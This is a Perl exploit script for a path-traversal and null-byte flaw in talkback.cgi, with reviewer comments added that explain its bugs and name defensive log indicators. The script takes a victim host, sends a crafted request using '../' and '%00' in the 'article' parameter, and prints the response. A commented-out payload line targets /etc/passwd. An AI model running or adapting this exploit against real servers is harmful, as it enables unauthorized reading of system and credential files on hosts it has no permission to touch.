#!/usr/bin/perl
# The script fails to check for '../' sequences and null bytes
# in the HTML variable
#
# -dkl- by NeMeS||y - dragon@shellnow.it

use LWP::UserAgent;
use Getopt::Std;

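# Print the command-line synopsis to STDOUT and terminate with exit status 1.
# Reached from the option handling below for -h and for a missing -v <host>.
# The empty `()` prototype of the original declaration is dropped: prototypes
# change how calls are parsed rather than validate arguments, and the existing
# call sites use the `&usage()` form, which bypasses prototypes anyway.
sub usage {
   print "\n-dkl-                                -dkl-\n\n";
   print "Usage: ".$0." -v <host> [port]\n\n";
   print "default port : 80\n\n";
   exit 1;
}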

# Option handling. The file enables neither `use strict` nor `use warnings`,
# so %opt, $victim, $port and the other variables below are package globals
# created on first use; a misspelled name would go unnoticed.
getopts('v:h', \%opt)||die("Problems... damn!!\n");
# -h: show the synopsis; usage() ends with exit 1, so nothing below runs.
# NOTE(review): `\&usage()` takes a reference to the return value of the call;
# it still appears to invoke usage(), but a plain `usage()` would be clearer.
if(defined($opt{'h'}))
  { \&usage() }
# -v <host> is mandatory; without it usage() exits before any request is built.
if(defined($opt{'v'}))
 { $victim=$opt{'v'} }
   else
    { \&usage() }

# Optional port from the first bare argument, default 80.
# When no argument is given $ARGV[0] is undef, so `eq ''` compares undef
# with the empty string (only a warning under `use warnings`, not enabled here).
if ($ARGV[0] eq '')
  { $port = 80; }
 else { $port = $ARGV[0]; };

# Commented-out variant: a directory-traversal payload aimed at /etc/passwd.
#$string  = "/cgi/bin/talkback.cgi?article=../../../../etc/passwd%00&action=&view&matchview=1";

# Active payload: the `article` parameter carries a `../` traversal and a
# `%00` null byte, which the vulnerable talkback.cgi does not reject (see the
# header comment). From a defender's view, `../` or `%00` inside the `article`
# query parameter in web-server access logs is the observable indicator, and
# canonicalising the path and rejecting null bytes server-side is the fix.
$string = "/cgi/bin/talkback.cgi?article=../cgi-bin/talkback.cgi?%00&action=view&matchview=1";

print "\nTalkBack.cgi exploit Coded by NeMeS||y\n\n";
print "Victim :: ".$victim."\n";
print "Port   :: ".$port."\n\n";

# Full request URL. Note that $port is printed above but never used here:
# the URL is built from $victim and $string alone, so the request always
# goes to the host's default HTTP port.
$exp_string = "http://".$victim.$string;
# NOTE(review): `User-Agent` is unquoted, so it appears to parse as the
# expression `User - Agent` rather than the header name; quote it
# ('User-Agent' => ...) if the header is meant to be sent. `new Class(...)`
# is indirect-object syntax; `HTTP::Headers->new(...)` is the conventional form.
$hdrs = new HTTP::Headers(Accept => 'text/plain', User-Agent => 'NeMBrowser/1.0');
# NOTE(review): URI::URL is not loaded explicitly in this file; confirm that
# the installed LWP brings it in, otherwise this line fails at runtime.
$url  = new URI::URL($exp_string);
# GET is a bareword here (a string only because strict is off).
$req  = new HTTP::Request(GET, $url, $hdrs);
# No timeout is configured on the agent; a non-responding host blocks here.
$ua   = new LWP::UserAgent;
$resp = $ua->request($req);
# On a 2xx response the raw body is printed unmodified; otherwise the status
# line message. Nothing distinguishes a vulnerable target from an ordinary
# page in the output — the caller has to read the body.
 if ($resp->is_success)
   {
     print "Message :\n".$resp->content; }
  else
   {
     print "Message :\n".$resp->message; }

print "\n\nE0F by NeMeS||y \n\n";

#dedicated to Annalisa